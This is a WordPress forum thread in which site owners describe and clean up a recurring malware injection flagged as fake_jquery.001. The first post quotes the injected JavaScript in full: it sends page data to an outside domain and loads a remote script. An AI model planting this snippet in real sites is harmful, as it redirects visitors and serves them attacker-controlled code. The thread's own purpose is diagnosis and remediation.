WordPress Blog Infected With Malware – Malware.fake_jquery.001

  • Hi, recently most of my WordPress sites got infected with malware.

    Problems:

    After scanning my sites on https://sitecheck.sucuri.net/ I receive the message as below:

    Known javascript malware. Details: https://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “https://geralddeanmandiri.com/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>

    I tried to install WordFence Plugin (and turn on all the options in this plugin) to scan my sites but it couldn’t detect the malware.

    I then went to edit my theme at editor section and I open the header.php file and look for the malware script just before the </head> tag.

    I then removed the script and save the file.

    Results

    By removing the script before the </head> tag of the header.php file, it worked for some websites and it didn’t work for other sites.

    I ran the scan on https://sitecheck.sucuri.net/ again, some of my sites were safe and some still had that malware script on categories, pages or even on the urls that don’t exist on my blog.

    Problems

    The sites that I removed the malware script from and were marked safe had the malware come back on the next day!

    Maybe the malware is somewhere on my server or something and it keeps injecting the malware script into my blog even when I removed it?

    Question

    How do I solve this problem and remove this stupid malware for good? What plugin do you recommend? What cleaning method do you suggest?

    Thank you everyone!

    Please help!

Viewing 3 replies - 16 through 18 (of 18 total)

  • also check folder permissions. it solved my problem.

    georgehagi

    (@georgehagi)

    Hi, the same issue here.

    Last week I received a notification from google ads that my site is potentially infected. It was true.

    All header.php of template files were compromised even the ones were not in use. As I share the server to host other sites, these other sites were infected as well.

    Now I’m fixing the issue. I deleted the malicious code manually in every header.php file. I have looked for the code into index.php files and 404.php but no infection was found.
    Every single wordpress site was infected.

    I also host a Joomla site and think it was the door the malicious code took advantage of to get into the server. A number of folders and php files were created along the joomla ones. Currently I’m deleting all these folders and files and making a backup. I’m going to turn down this site for a while until I finish cleaning the other wordpress installations because there were files with cronjobs that I suspect are responsible of creating malicious code periodically.

    I changed my hosting, ftp, cms passwords and hardened all options on sucuri for wordpress. Now my site appears clean.

    I have been working on this issue since yesterday and everything is working fine. No malicious code was generated again.

    Hope this helps! Going to keep you updated…

    Metbarton, your site has (had?) the Darkleech virus.

    https://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html

Viewing 3 replies - 16 through 18 (of 18 total)
  • The topic ‘WordPress Blog Infected With Malware – Malware.fake_jquery.001’ is closed to new replies.